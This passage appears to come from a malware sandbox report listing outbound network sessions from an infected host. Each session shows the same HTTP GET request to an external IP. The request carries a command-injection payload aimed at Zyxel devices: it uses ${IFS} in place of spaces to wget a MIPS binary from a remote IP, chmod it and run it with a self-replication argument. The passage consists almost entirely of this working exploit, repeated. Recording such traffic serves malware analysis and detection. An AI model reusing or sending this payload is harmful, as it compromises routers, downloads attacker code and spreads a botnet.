                                                Jan 12, 2024 18:16:28.585099936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5828192.168.2.2354208158.78.185.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.585185051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5829192.168.2.233410613.226.95.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.585254908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5830192.168.2.2352778102.3.163.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.585316896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5831192.168.2.234995298.224.193.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.585416079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5832192.168.2.2332816208.229.104.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.585484028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5833192.168.2.2348556149.199.42.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.585549116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5834192.168.2.2358858170.87.82.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.585602999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5835192.168.2.2336594139.250.52.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.585669041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5836192.168.2.234963299.244.252.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.585740089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5837192.168.2.235861623.36.249.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.585803032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5838192.168.2.2339540108.128.56.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.585861921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5839192.168.2.2342938185.235.121.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.585911036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5840192.168.2.233695286.188.253.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.585989952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5841192.168.2.2347128207.146.138.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.586071968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5842192.168.2.23452805.92.143.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.586133003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5843192.168.2.233988049.228.58.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.586349010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5844192.168.2.2333884108.5.159.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.586453915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5845192.168.2.2348600161.17.150.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.586508989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5846192.168.2.2346940196.125.33.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.586575985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5847192.168.2.235030238.27.167.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.586651087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5848192.168.2.2348008185.63.137.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.586709976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5849192.168.2.2350350160.102.220.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.586770058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5850192.168.2.2358274177.201.101.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.586843967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5851192.168.2.2337494106.242.56.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.586884975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5852192.168.2.233924420.186.83.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.586958885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5853192.168.2.2356760125.36.97.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.587055922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5854192.168.2.234159819.187.236.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.587129116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5855192.168.2.2335750152.75.7.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.587193012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5856192.168.2.2336088181.237.99.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.587249994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5857192.168.2.2352328221.130.206.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.587316036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5858192.168.2.2334416106.206.248.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.587379932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5859192.168.2.233809673.232.145.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.587421894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5860192.168.2.2346842117.64.172.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.587483883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5861192.168.2.234963695.144.101.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.587543964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5862192.168.2.234400298.210.55.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.587568045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5863192.168.2.234059681.134.85.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.587630987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5864192.168.2.234647435.107.11.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.587672949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5865192.168.2.234856661.108.253.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.587716103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5866192.168.2.235534637.175.217.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.587769032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5867192.168.2.233863296.213.142.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.587831974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5868192.168.2.2336688145.146.73.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.587888956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5869192.168.2.236028213.235.4.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.587918997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5870192.168.2.2360126152.146.186.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.587975979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5871192.168.2.2349888150.26.162.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.588038921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5872192.168.2.233487265.11.149.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.588119030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5873192.168.2.23400465.224.27.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.588185072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5874192.168.2.2341638212.131.158.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.588231087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5875192.168.2.2344976189.255.102.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.588350058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5876192.168.2.235448613.108.128.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.588397980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5877192.168.2.2341516130.160.166.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.588423967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5878192.168.2.233715283.208.12.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.588463068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5879192.168.2.235135235.231.93.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.588519096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5880192.168.2.2336652114.235.21.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.588562012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5881192.168.2.234888679.62.227.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.588649988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5882192.168.2.2348940175.209.224.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.588709116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5883192.168.2.2335656222.6.38.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.588762999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5884192.168.2.2351950176.113.62.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.588804960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5885192.168.2.234229647.51.204.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.588867903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5886192.168.2.2345848124.210.106.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.588926077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5887192.168.2.2349624195.211.15.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.594158888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5888192.168.2.2345282143.113.129.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.594224930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5889192.168.2.2353078179.119.176.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.594289064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5890192.168.2.2346996112.243.164.118443
                                                TimestampBytes transferredDirectionData
